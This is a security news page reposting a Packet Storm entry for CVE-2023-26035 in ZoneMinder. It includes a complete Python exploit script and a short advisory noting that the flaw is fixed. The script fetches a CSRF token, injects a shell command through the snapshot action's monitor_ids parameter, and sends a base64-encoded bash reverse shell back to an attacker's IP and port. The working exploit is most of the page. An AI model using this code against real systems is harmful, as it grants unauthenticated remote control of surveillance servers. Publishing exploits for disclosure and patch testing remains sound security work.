Security
Headlines
HeadlinesLatestCVEs

Headline

ZoneMinder Snapshots Remote Code Execution

ZoneMinder Snapshots versions prior to 1.37.33 suffer from an unauthenticated remote code execution vulnerability.

Packet Storm
#csrf#vulnerability#linux#git#php#rce#auth
import reimport requestsfrom bs4 import BeautifulSoupimport argparseimport base64# Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots# Date: 12 December 2023# Discovered by : @Unblvr1# Exploit Author: Ravindu Wickramasinghe (@rvizx9)# Vendor Homepage: https://zoneminder.com/# Software Link: https://github.com/ZoneMinder/zoneminder# Version: prior to 1.36.33 and 1.37.33# Tested on: Arch Linux, Kali Linux# CVE : CVE-2023-26035# Github Link : https://github.com/rvizx/CVE-2023-26035class ZoneMinderExploit:    def __init__(self, target_uri):        self.target_uri = target_uri        self.csrf_magic = None    def fetch_csrf_token(self):        print("[>] fetching csrt token")        response = requests.get(self.target_uri)        self.csrf_magic = self.get_csrf_magic(response)        if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic):            print(f"[>] recieved the token: {self.csrf_magic}")            return True        print("[!] unable to fetch or parse token.")        return False    def get_csrf_magic(self, response):        return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None)    def execute_command(self, cmd):        print("[>] sending payload..")        data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic}        response = requests.post(f"{self.target_uri}/index.php", data=data)        print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload")    def exploit(self, payload):        if self.fetch_csrf_token():            print(f"[>] executing...")            self.execute_command(payload)if __name__ == "__main__":    parser = argparse.ArgumentParser()    parser.add_argument('-t', '--target-url', required=True, help='target url endpoint')    parser.add_argument('-ip', '--local-ip', required=True, help='local ip')    parser.add_argument('-p', '--port', required=True, help='port')    args = parser.parse_args()    # generating the payload    ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1"      ps2 = base64.b64encode(ps1.encode()).decode()    payload = f"echo {ps2} | base64 -d | /bin/bash"    ZoneMinderExploit(args.target_url).exploit(payload)

Related news

CVE-2023-26035: Unauthenticated RCE in snapshots

ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in This issue is fixed in versions 1.36.33 and 1.37.33.

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution